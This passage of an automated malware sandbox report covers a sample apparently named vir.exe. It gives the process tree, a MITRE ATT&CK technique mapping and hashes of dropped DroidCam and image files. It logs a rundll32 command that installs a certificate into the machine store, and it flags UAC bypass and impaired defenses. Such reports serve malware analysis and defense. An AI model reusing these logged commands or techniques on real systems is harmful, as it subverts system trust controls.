                                                                                                                                    "C:\Windows\system32\rundll32.exe" C:\Windows\system32\cryptext.dll,CryptExtAddCERMachineOnlyAndHwnd MIIFIjCCBAqgAwIBAgIQCqCZ5k4hTWVYAeo4rYdnETANBgkqhkiG9w0BAQsFADByMQswCQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3d3cuZGlnaWNlcnQuY29tMTEwLwYDVQQDEyhEaWdpQ2VydCBTSEEyIEFzc3VyZWQgSUQgQ29kZSBTaWduaW5nIENBMB4XDTIwMDkxMDAwMDAwMFoXDTIzMTEwMjEyMDAwMFowXzELMAkGA1UEBhMCQ0ExEDAOBgNVBAgTB09udGFyaW8xEDAOBgNVBAcTB1Rvcm9udG8xFTATBgNVBAoTDFBzaXBob24gSW5jLjEVMBMGA1UEAxMMUHNpcGhvbiBJbmMuMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAopA/y+sHi0hAZs2sIP7SFz8NHjZRvD94wLic2a0dNsoHKRtgJk4Iu9w/OnxjkaVegG6W0AxuR20JZHaqbpn4QYYegXmcsS3dDwWreff0qjeWvfTOZYl4JNUz/nM8NjVsdjE5OSv6QGma8b2CSpfhLOE3WTGDPu7P9VvsEnYqyM/9a0yciRcvsHL6Z1qsUU9n9xBp8Rv6grNE5ZJmnbaD7dqmVato3TigFTfkYWyWsoX6RE7HTNAgR5/UI3ZQRv3/8himP2R6LgpB8a8CNBFD4m6jgFJIZ1FTU5NhoiAi6WrLb5qL0cxGBQ/Fgvau9fA1FaCB2GEH4CA+Lz+kA6jO+QIDAQABo4IBxTCCAcEwHwYDVR0jBBgwFoAUWsS5eyoKo6XqcQPAYPkt9mV1DlgwHQYDVR0OBBYEFJMsp1KTjKEwhxLpKIXWkqjEumhRMA4GA1UdDwEB/wQEAwIHgDATBgNVHSUEDDAKBggrBgEFBQcDAzB3BgNVHR8EcDBuMDWgM6Axhi9odHRwOi8vY3JsMy5kaWdpY2VydC5jb20vc2hhMi1hc3N1cmVkLWNzLWcxLmNybDA1oDOgMYYvaHR0cDovL2NybDQuZGlnaWNlcnQuY29tL3NoYTItYXNzdXJlZC1jcy1nMS5jcmwwTAYDVR0gBEUwQzA3BglghkgBhv1sAwEwKjAoBggrBgEFBQcCARYcaHR0cHM6Ly93d3cuZGlnaWNlcnQuY29tL0NQUzAIBgZngQwBBAEwgYQGCCsGAQUFBwEBBHgwdjAkBggrBgEFBQcwAYYYaHR0cDovL29jc3AuZGlnaWNlcnQuY29tME4GCCsGAQUFBzAChkJodHRwOi8vY2FjZXJ0cy5kaWdpY2VydC5jb20vRGlnaUNlcnRTSEEyQXNzdXJlZElEQ29kZVNpZ25pbmdDQS5jcnQwDAYDVR0TAQH/BAIwADANBgkqhkiG9w0BAQsFAAOCAQEAXdKjKYYRGJY1EJZYGmjKEHPSesLG941LNxRX5hbX5+4TGCjiPwzFS55F+1NpGgaHq89LZC7/BmKLNA3QHn03GNsGJ+FD+xc0+WXjWFfkmU8lwtYN2SomOklWyxTDwQXDJjGrsjUBVrJBH++ErIElqU5BtkM9O05ta0cOW4TqkdTP+/WOt61nt3/cgom4ygRKQ3WjKYLvHbjuewBn/fYWqcODpX1n1yr/uYslCjXRRr4M/88kjBGq18IMZ9wb1+tautImkYvxDFgYlTBAj1IQfkw3Fa6e9C0OiMiUitKzXhh1hBuXnkBGnSLSvg3wld/UvgN65dRrNAxujm+jX2xKKA== 591146
                                                                                                                                    4⤵
                                                                                                                                    • Blocklisted process makes network request
                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                    • Modifies system certificate store
                                                                                                                                    PID:4908
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\vir_d9b73c61-590d-4742-8f13-8bac763d7f6e\f3cb220f1aaa32ca310586e5f62dcab1.exe
                                                                                                                                  f3cb220f1aaa32ca310586e5f62dcab1.exe
                                                                                                                                  3⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  PID:3348
                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/account
                                                                                                                                    4⤵
                                                                                                                                      PID:3136
                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x128,0x12c,0x130,0x104,0x134,0x7ffba9be46f8,0x7ffba9be4708,0x7ffba9be4718
                                                                                                                                        5⤵
                                                                                                                                          PID:6240
                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/video
                                                                                                                                        4⤵
                                                                                                                                          PID:6608
                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffba9be46f8,0x7ffba9be4708,0x7ffba9be4718
                                                                                                                                            5⤵
                                                                                                                                              PID:452
                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
                                                                                                                                            4⤵
                                                                                                                                              PID:4964
                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffba9be46f8,0x7ffba9be4708,0x7ffba9be4718
                                                                                                                                                5⤵
                                                                                                                                                  PID:6924
                                                                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                              timeout /t 15
                                                                                                                                              3⤵
                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                              PID:1092
                                                                                                                                            • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                              xcopy C:\Windows\System32\WinMetadata C:\Users\Admin\Desktop
                                                                                                                                              3⤵
                                                                                                                                              • Enumerates system info in registry
                                                                                                                                              PID:5640
                                                                                                                                            • C:\Windows\SysWOW64\regedit.exe
                                                                                                                                              regedit
                                                                                                                                              3⤵
                                                                                                                                              • Runs regedit.exe
                                                                                                                                              PID:5860
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\328b2acb-8a07-4263-b588-a71ac9ca8225\packer.exe
                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\328b2acb-8a07-4263-b588-a71ac9ca8225\packer.exe" "C:\Users\Admin\AppData\Local\Temp\328b2acb-8a07-4263-b588-a71ac9ca8225\unpacker.exe" "C:\Users\Admin\Desktop\vir.exe" "!main.cmd" "C:\Users\Admin\AppData\Local\Temp\vir_d9b73c61-590d-4742-8f13-8bac763d7f6e" "" True True False 0 -repack
                                                                                                                                            2⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            PID:5888
                                                                                                                                        • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                          C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                          1⤵
                                                                                                                                            PID:1332
                                                                                                                                          • C:\Windows\system32\efsui.exe
                                                                                                                                            efsui.exe /efs /keybackup
                                                                                                                                            1⤵
                                                                                                                                              PID:2708
                                                                                                                                            • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                              C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                              1⤵
                                                                                                                                                PID:6000
                                                                                                                                              • C:\Windows\System32\svchost.exe
                                                                                                                                                C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                                1⤵
                                                                                                                                                  PID:4292
                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 5352 -ip 5352
                                                                                                                                                    2⤵
                                                                                                                                                      PID:5340
                                                                                                                                                  • C:\Windows\system32\AUDIODG.EXE
                                                                                                                                                    C:\Windows\system32\AUDIODG.EXE 0x45c 0x2f4
                                                                                                                                                    1⤵
                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                    PID:1556
                                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                                    C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall
                                                                                                                                                    1⤵
                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                    PID:2144
                                                                                                                                                    • C:\Windows\system32\DrvInst.exe
                                                                                                                                                      DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{54f2ba5d-a157-9f4e-8624-46e2b5047667}\droidcamvideo.inf" "9" "41e7d49db" "000000000000014C" "WinSta0\Default" "000000000000015C" "208" "c:\program files (x86)\droidcam\lib"
                                                                                                                                                      2⤵
                                                                                                                                                      • Drops file in System32 directory
                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                      PID:2456
                                                                                                                                                    • C:\Windows\system32\DrvInst.exe
                                                                                                                                                      DrvInst.exe "2" "231" "ROOT\MEDIA\0000" "C:\Windows\INF\oem3.inf" "oem3.inf:c14ce8845b5e8bf3:DroidCamVideo.Device:21.4.1.0:droidcamvideo," "41e7d49db" "000000000000014C"
                                                                                                                                                      2⤵
                                                                                                                                                      • Registers COM server for autorun
                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                      • Modifies registry class
                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                      PID:5644
                                                                                                                                                    • C:\Windows\system32\DrvInst.exe
                                                                                                                                                      DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{6e9a67fc-7ec7-f94c-830f-73ba70a24100}\droidcam.inf" "9" "4e67c8bbf" "000000000000014C" "WinSta0\Default" "0000000000000160" "208" "c:\program files (x86)\droidcam\lib"
                                                                                                                                                      2⤵
                                                                                                                                                      • Drops file in System32 directory
                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                      PID:1128
                                                                                                                                                    • C:\Windows\system32\DrvInst.exe
                                                                                                                                                      DrvInst.exe "2" "231" "ROOT\MEDIA\0001" "C:\Windows\INF\oem4.inf" "oem4.inf:ed86ca11f01d07d6:DroidCam_PCMEX:1.0.0.0:droidcam," "4e67c8bbf" "000000000000014C"
                                                                                                                                                      2⤵
                                                                                                                                                      • Drops file in Drivers directory
                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                      PID:5252
                                                                                                                                                  • C:\Windows\system32\OpenWith.exe
                                                                                                                                                    C:\Windows\system32\OpenWith.exe -Embedding
                                                                                                                                                    1⤵
                                                                                                                                                      PID:1288
                                                                                                                                                    • C:\Windows\system32\OpenWith.exe
                                                                                                                                                      C:\Windows\system32\OpenWith.exe -Embedding
                                                                                                                                                      1⤵
                                                                                                                                                      • Modifies registry class
                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                      PID:3224
                                                                                                                                                    • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                      C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                      1⤵
                                                                                                                                                        PID:6724
                                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                                        C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                                                                                                                                        1⤵
                                                                                                                                                          PID:6768
                                                                                                                                                        • C:\Windows\system32\LogonUI.exe
                                                                                                                                                          "LogonUI.exe" /flags:0x4 /state0:0xa38a1055 /state1:0x41c64e6d
                                                                                                                                                          1⤵
                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                          PID:3316

                                                                                                                                                        Network

                                                                                                                                                        MITRE ATT&CK Matrix ATT&CK v13

                                                                                                                                                        Execution

                                                                                                                                                        Command and Scripting Interpreter

                                                                                                                                                        2
                                                                                                                                                        T1059

                                                                                                                                                        PowerShell

                                                                                                                                                        1
                                                                                                                                                        T1059.001

                                                                                                                                                        Scheduled Task/Job

                                                                                                                                                        1
                                                                                                                                                        T1053

                                                                                                                                                        Persistence

                                                                                                                                                        Boot or Logon Autostart Execution

                                                                                                                                                        3
                                                                                                                                                        T1547

                                                                                                                                                        Registry Run Keys / Startup Folder

                                                                                                                                                        2
                                                                                                                                                        T1547.001

                                                                                                                                                        Winlogon Helper DLL

                                                                                                                                                        1
                                                                                                                                                        T1547.004

                                                                                                                                                        Create or Modify System Process

                                                                                                                                                        1
                                                                                                                                                        T1543

                                                                                                                                                        Windows Service

                                                                                                                                                        1
                                                                                                                                                        T1543.003

                                                                                                                                                        Scheduled Task/Job

                                                                                                                                                        1
                                                                                                                                                        T1053

                                                                                                                                                        Privilege Escalation

                                                                                                                                                        Boot or Logon Autostart Execution

                                                                                                                                                        3
                                                                                                                                                        T1547

                                                                                                                                                        Registry Run Keys / Startup Folder

                                                                                                                                                        2
                                                                                                                                                        T1547.001

                                                                                                                                                        Winlogon Helper DLL

                                                                                                                                                        1
                                                                                                                                                        T1547.004

                                                                                                                                                        Abuse Elevation Control Mechanism

                                                                                                                                                        1
                                                                                                                                                        T1548

                                                                                                                                                        Bypass User Account Control

                                                                                                                                                        1
                                                                                                                                                        T1548.002

                                                                                                                                                        Create or Modify System Process

                                                                                                                                                        1
                                                                                                                                                        T1543

                                                                                                                                                        Windows Service

                                                                                                                                                        1
                                                                                                                                                        T1543.003

                                                                                                                                                        Scheduled Task/Job

                                                                                                                                                        1
                                                                                                                                                        T1053

                                                                                                                                                        Defense Evasion

                                                                                                                                                        Modify Registry

                                                                                                                                                        8
                                                                                                                                                        T1112

                                                                                                                                                        Abuse Elevation Control Mechanism

                                                                                                                                                        1
                                                                                                                                                        T1548

                                                                                                                                                        Bypass User Account Control

                                                                                                                                                        1
                                                                                                                                                        T1548.002

                                                                                                                                                        Impair Defenses

                                                                                                                                                        3
                                                                                                                                                        T1562

                                                                                                                                                        Disable or Modify Tools

                                                                                                                                                        2
                                                                                                                                                        T1562.001

                                                                                                                                                        Disable or Modify System Firewall

                                                                                                                                                        1
                                                                                                                                                        T1562.004

                                                                                                                                                        Subvert Trust Controls

                                                                                                                                                        2
                                                                                                                                                        T1553

                                                                                                                                                        SIP and Trust Provider Hijacking

                                                                                                                                                        1
                                                                                                                                                        T1553.003

                                                                                                                                                        Install Root Certificate

                                                                                                                                                        1
                                                                                                                                                        T1553.004

                                                                                                                                                        File and Directory Permissions Modification

                                                                                                                                                        1
                                                                                                                                                        T1222

                                                                                                                                                        Hide Artifacts

                                                                                                                                                        1
                                                                                                                                                        T1564

                                                                                                                                                        Hidden Files and Directories

                                                                                                                                                        1
                                                                                                                                                        T1564.001

                                                                                                                                                        Credential Access

                                                                                                                                                        Unsecured Credentials

                                                                                                                                                        1
                                                                                                                                                        T1552

                                                                                                                                                        Credentials In Files

                                                                                                                                                        1
                                                                                                                                                        T1552.001

                                                                                                                                                        Discovery

                                                                                                                                                        Query Registry

                                                                                                                                                        5
                                                                                                                                                        T1012

                                                                                                                                                        System Information Discovery

                                                                                                                                                        7
                                                                                                                                                        T1082

                                                                                                                                                        Peripheral Device Discovery

                                                                                                                                                        1
                                                                                                                                                        T1120

                                                                                                                                                        Process Discovery

                                                                                                                                                        1
                                                                                                                                                        T1057

                                                                                                                                                        Remote System Discovery

                                                                                                                                                        1
                                                                                                                                                        T1018

                                                                                                                                                        Collection

                                                                                                                                                        Data from Local System

                                                                                                                                                        1
                                                                                                                                                        T1005

                                                                                                                                                        Command and Control

                                                                                                                                                        Web Service

                                                                                                                                                        1
                                                                                                                                                        T1102

                                                                                                                                                        Impact

                                                                                                                                                        Defacement

                                                                                                                                                        1
                                                                                                                                                        T1491

                                                                                                                                                        Replay Monitor

                                                                                                                                                        Loading Replay Monitor...

                                                                                                                                                        Downloads

                                                                                                                                                        • C:\Program Files (x86)\DroidCam\DroidCamApp.exe
                                                                                                                                                          Filesize

                                                                                                                                                          942KB

                                                                                                                                                          MD5

                                                                                                                                                          f8c12fc1b20887fdb70c7f02f0d7bfb3

                                                                                                                                                          SHA1

                                                                                                                                                          28d18fd281e17c919f81eda3a2f0d8765f57049f

                                                                                                                                                          SHA256

                                                                                                                                                          082f5c3fd2fd80505cbd4dbdbb7c50e83c2e81f033a04ea53832dbf0a3fc4933

                                                                                                                                                          SHA512

                                                                                                                                                          97c5d158abb119e076ace4b1398de19029b5d44566d9a293811bf7edbb0db120354cc396aed72bf62766799dc5db266d4b2ee7aee3ffc2818d8be77a4665ad2f

                                                                                                                                                        • C:\Program Files (x86)\rover\Breath.wav
                                                                                                                                                          Filesize

                                                                                                                                                          6KB

                                                                                                                                                          MD5

                                                                                                                                                          c6bf51f165022883725aa60448753428

                                                                                                                                                          SHA1

                                                                                                                                                          870806d5f526bb527985ddf4bbe477aee454a511

                                                                                                                                                          SHA256

                                                                                                                                                          a7cb1954912b711624a47a35688eb044a272f14c80c923c1cb3dcf0c207c1b0a

                                                                                                                                                          SHA512

                                                                                                                                                          bf071d6b36bffdbc33867001ba5780d06a90d185ed2fac50f851acc0303b63dd0169950fc0a77f42cb4639fea7adaf67dbce6163e75fd6f8cafdc0b70c2676cb

                                                                                                                                                        • C:\Program Files (x86)\rover\Come\Come.001.png
                                                                                                                                                          Filesize

                                                                                                                                                          2KB

                                                                                                                                                          MD5

                                                                                                                                                          8d0dfb878717f45062204acbf1a1f54c

                                                                                                                                                          SHA1

                                                                                                                                                          1175501fc0448ad267b31a10792b2469574e6c4a

                                                                                                                                                          SHA256

                                                                                                                                                          8cf6a20422a0f72bcb0556b3669207798d8f50ceec6b301b8f0f1278b8f481f9

                                                                                                                                                          SHA512

                                                                                                                                                          e4f661ba8948471ffc9e14c18c6779dba3bd9dcc527d646d503c7d4bdff448b506a7746154380870262902f878275a8925bf6aa12a0b8c6eb8517f3a72405558

                                                                                                                                                        • C:\Program Files (x86)\rover\Come\Come.002.png
                                                                                                                                                          Filesize

                                                                                                                                                          2KB

                                                                                                                                                          MD5

                                                                                                                                                          da104c1bbf61b5a31d566011f85ab03e

                                                                                                                                                          SHA1

                                                                                                                                                          a05583d0f814685c4bb8bf16fd02449848efddc4

                                                                                                                                                          SHA256

                                                                                                                                                          6b47ad7fe648620ea15b9c07e62880af48a504b83e8031b2521c25e508aa0ef1

                                                                                                                                                          SHA512

                                                                                                                                                          a8e27abefb0f5bfffe15a19fd882b2e112687abe6ac4bbd5187036cb6058b0124d6ce76fc9227970c8fe2f5768aa0d1faa3319d33b1f42413e8bdfe2ce15296d

                                                                                                                                                        • C:\Program Files (x86)\rover\Come\Come.004.png
                                                                                                                                                          Filesize

                                                                                                                                                          2KB

                                                                                                                                                          MD5

                                                                                                                                                          f57ff98d974bc6b6d0df56263af5ca0d

                                                                                                                                                          SHA1

                                                                                                                                                          2786eb87cbe958495a0113f16f8c699935c74ef9

                                                                                                                                                          SHA256

                                                                                                                                                          9508d82995364556a882c54306210e885868a8df2f2ad93485c14f88c9f9e1b7

                                                                                                                                                          SHA512

                                                                                                                                                          1d4ca268d1c98ac545008b079076609e18bfdf22cd31b7b75b9218d03c6edb37b245298ff717e48309ca862f973a4383b101e43732a162b4d7f78573612c64ea

                                                                                                                                                        • C:\Program Files (x86)\rover\Come\Come.005.png
                                                                                                                                                          Filesize

                                                                                                                                                          2KB

                                                                                                                                                          MD5

                                                                                                                                                          7fb2e99c5a3f7a30ba91cb156ccc19b7

                                                                                                                                                          SHA1

                                                                                                                                                          4b70de8bb59dca60fc006d90ae6d8c839eff7e6e

                                                                                                                                                          SHA256

                                                                                                                                                          40436d5ab3589d33dae09b470ccacd369422d2569804cf1532e5946fc7e45535

                                                                                                                                                          SHA512

                                                                                                                                                          c0d83325928d629abba648360c8687091d18d52991297d69625ccd4617d4d5add4aa16c288cc408b26c79cd37decf5ee2198e8b87b67ef5b88802afae93fb51a

                                                                                                                                                        • C:\Program Files (x86)\rover\Come\Come.006.png
                                                                                                                                                          Filesize

                                                                                                                                                          3KB

                                                                                                                                                          MD5

                                                                                                                                                          a49c8996d20dfb273d03d2d37babd574

                                                                                                                                                          SHA1

                                                                                                                                                          96a93fd5aa1d5438217f17bffbc26e668d28feaf

                                                                                                                                                          SHA256

                                                                                                                                                          f4c568336894b3140f0ca7005a5751ad5a860422290b2b6e23d72656160862b1

                                                                                                                                                          SHA512

                                                                                                                                                          9abb666891fa00ae77801fe9b3aab62bca37402197d22983e98d8442e6d890b1091a47dc1eca1ac68caa52a633bb60c8c3248de65056a6435f4affb98f401a30

                                                                                                                                                        • C:\Program Files (x86)\rover\Come\Come.007.png
                                                                                                                                                          Filesize

                                                                                                                                                          3KB

                                                                                                                                                          MD5

                                                                                                                                                          e65884abe6126db5839d7677be462aba

                                                                                                                                                          SHA1

                                                                                                                                                          4f7057385928422dc8ec90c2fc3488201a0287a8

                                                                                                                                                          SHA256

                                                                                                                                                          8956643da83aa74bc89b4d71db7b470200863de230be647a6881d8f3f60df3ac

                                                                                                                                                          SHA512

                                                                                                                                                          7285b8acca0210a85dd4317a7beab161708544c4c25a742ce7284b545fa4953be89eb685e62f30fba56d6cb2fc806062ccdf4a0e62516eea047097c6856900c2

                                                                                                                                                        • C:\Program Files (x86)\rover\Come\Come.008.png
                                                                                                                                                          Filesize

                                                                                                                                                          3KB

                                                                                                                                                          MD5

                                                                                                                                                          f355305ada3929ac1294e6c38048b133

                                                                                                                                                          SHA1

                                                                                                                                                          a488065c32b92d9899b3125fb504d8a00d054e0e

                                                                                                                                                          SHA256

                                                                                                                                                          37de9b0126ffa3967455083dd72ba70501b1e4c92ae25eb0667f840911585775

                                                                                                                                                          SHA512

                                                                                                                                                          6082003d98022597007623ff7cdece9d9a14ad19bf55ac35afb2277fe22378c865899a5b28b4b5828d0d48fb7859fea82886d98d8d3a3813413f1e864e3849b2

                                                                                                                                                        • C:\Program Files (x86)\rover\Come\Come.009.png
                                                                                                                                                          Filesize

                                                                                                                                                          3KB

                                                                                                                                                          MD5

                                                                                                                                                          1d812d808b4fd7ca678ea93e2b059e17

                                                                                                                                                          SHA1

                                                                                                                                                          c02b194f69cead015d47c0bad243a4441ec6d2cd

                                                                                                                                                          SHA256

                                                                                                                                                          e4e2fe6652557dec0e703da7325808cab4722961398dc9bf9fdae36c1de8841d

                                                                                                                                                          SHA512

                                                                                                                                                          a8781c78d7d23f70f7450e749732d2909447cfa194d8e49a899c77f808e735878da8d838eecb4e8db7470d040800ae45f977d5f208bfad6c15d62d6456611e84

                                                                                                                                                        • C:\Program Files (x86)\rover\Come\Come.010.png
                                                                                                                                                          Filesize

                                                                                                                                                          3KB

                                                                                                                                                          MD5

                                                                                                                                                          e0436699f1df69af9e24efb9092d60a9

                                                                                                                                                          SHA1

                                                                                                                                                          d2c6eed1355a8428c5447fa2ecdd6a3067d6743e

                                                                                                                                                          SHA256

                                                                                                                                                          eeae94fa4ddca88b0fefec2e449064ea1c6d4c8772762bb900dc7752b68706e4

                                                                                                                                                          SHA512

                                                                                                                                                          d6b4adf98c9deb784be1f775a138a7252b558b9d9443a8a3d1435043196738b1ea32439cd09c507d0e2a074a5ba2973e7ffce6c41b26e17460b7695428666cbf

                                                                                                                                                        • C:\Program Files (x86)\rover\Come\Come.011.png
                                                                                                                                                          Filesize

                                                                                                                                                          3KB

                                                                                                                                                          MD5

                                                                                                                                                          f45528dfb8759e78c4e933367c2e4ea8

                                                                                                                                                          SHA1

                                                                                                                                                          836962ef96ed4597dbc6daa38042c2438305693a

                                                                                                                                                          SHA256

                                                                                                                                                          31d92998e8e9de48700039027a935b5de3242afd4938e6b10509dc87d84eb758

                                                                                                                                                          SHA512

                                                                                                                                                          16561ca527e2081519decbc0fb04b9955b398eb97db7a3d442500b6aefcb4e620bebd87d7c8ddad2cf940035710fc5a000b59d7ed5d0aa06f3af87e9eebcb523

                                                                                                                                                        • C:\Program Files (x86)\rover\Come\Come.012.png
                                                                                                                                                          Filesize

                                                                                                                                                          3KB

                                                                                                                                                          MD5

                                                                                                                                                          195bb4fe6012b2d9e5f695269970fce5

                                                                                                                                                          SHA1

                                                                                                                                                          a62ef137a9bc770e22de60a8f68b6cc9f36e343b

                                                                                                                                                          SHA256

                                                                                                                                                          afa59cb80b91e29360a95746979be494bdee659d9b8bfad65782b474273d5e62

                                                                                                                                                          SHA512

                                                                                                                                                          8fbe3ca2950261d976b80efd6a8d36d4a47b445a3e4669e100ce8c5d2a1f692e7b40ab324494a6de7847861d99194e13344a84aa135e458924b95fadf3905fd4

                                                                                                                                                        • C:\Program Files (x86)\rover\Come\Come.013.png
                                                                                                                                                          Filesize

                                                                                                                                                          3KB

                                                                                                                                                          MD5

                                                                                                                                                          3c0ef957c7c8d205fca5dae28b9c7b10

                                                                                                                                                          SHA1

                                                                                                                                                          4b5927bf1cf8887956152665143f4589d0875d58

                                                                                                                                                          SHA256

                                                                                                                                                          3e6a44a4e993d70a2f8409b4194fa15551d5f7a3651a5d1e74d3c6b640da08c7

                                                                                                                                                          SHA512

                                                                                                                                                          bf2a5dd182c7cce4f6d00a4a1738f3a777b61c612c2449716b0fa62c62570ca1c21ac0063c221923e5db3b4101a4e7e32e711c9bfa075a2949ea9fa2e51ca704

                                                                                                                                                        • C:\Program Files (x86)\rover\Come\Come.014.png
                                                                                                                                                          Filesize

                                                                                                                                                          3KB

                                                                                                                                                          MD5

                                                                                                                                                          2445d5c72c6344c48065349fa4e1218c

                                                                                                                                                          SHA1

                                                                                                                                                          89df27d1b534eb47fae941773d8fce0e0ee1d036

                                                                                                                                                          SHA256

                                                                                                                                                          694d6774638b36148f7a1b14809a025a16895ad4ec8645a6db2fe9cd5f784dbb

                                                                                                                                                          SHA512

                                                                                                                                                          d8134a66845c71d633f56e5fd656d545f09dad82d18ec21a7415f825cb6c0634ed775008c6fdea83dfec95ce659144e6de806edac620f389fcc3064683c3a7b3

                                                                                                                                                        • C:\Program Files (x86)\rover\Come\Come.015.png
                                                                                                                                                          Filesize

                                                                                                                                                          3KB

                                                                                                                                                          MD5

                                                                                                                                                          678d78316b7862a9102b9245b3f4a492

                                                                                                                                                          SHA1

                                                                                                                                                          b272d1d005e06192de047a652d16efa845c7668c

                                                                                                                                                          SHA256

                                                                                                                                                          26fab597e882c877562abea6b13557c60d3ed07fd359314cdc3a558f8224266b

                                                                                                                                                          SHA512

                                                                                                                                                          cb6154e67ea75612dddd426e448f78c87946b123ff7b81f3fc83444adac4692bb5f3a04038291d9df7e102a301e41541a10e709e8adfde376016d86de15087db

                                                                                                                                                        • C:\Program Files (x86)\rover\Come\Come.016.png
                                                                                                                                                          Filesize

                                                                                                                                                          3KB

                                                                                                                                                          MD5

                                                                                                                                                          aa4c8764a4b2a5c051e0d7009c1e7de3

                                                                                                                                                          SHA1

                                                                                                                                                          5e67091400cba112ac13e3689e871e5ce7a134fe

                                                                                                                                                          SHA256

                                                                                                                                                          1da7b39ec5f3cad19dc66f46fee90c22a5a023a541eca76325074bee5c5a7260

                                                                                                                                                          SHA512

                                                                                                                                                          eea254f7327639999f68f4f67308f4251d900adb725f62c71c198d83b62aa3215f2ce23bd679fddde6ac0c40a5c7b6b04800bc069f2940e21e173b830d5762e2

                                                                                                                                                        • C:\Program Files (x86)\rover\Come\Come.017.png
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                          MD5

                                                                                                                                                          7c216e06c4cb8d9e499b21b1a05c3e4a

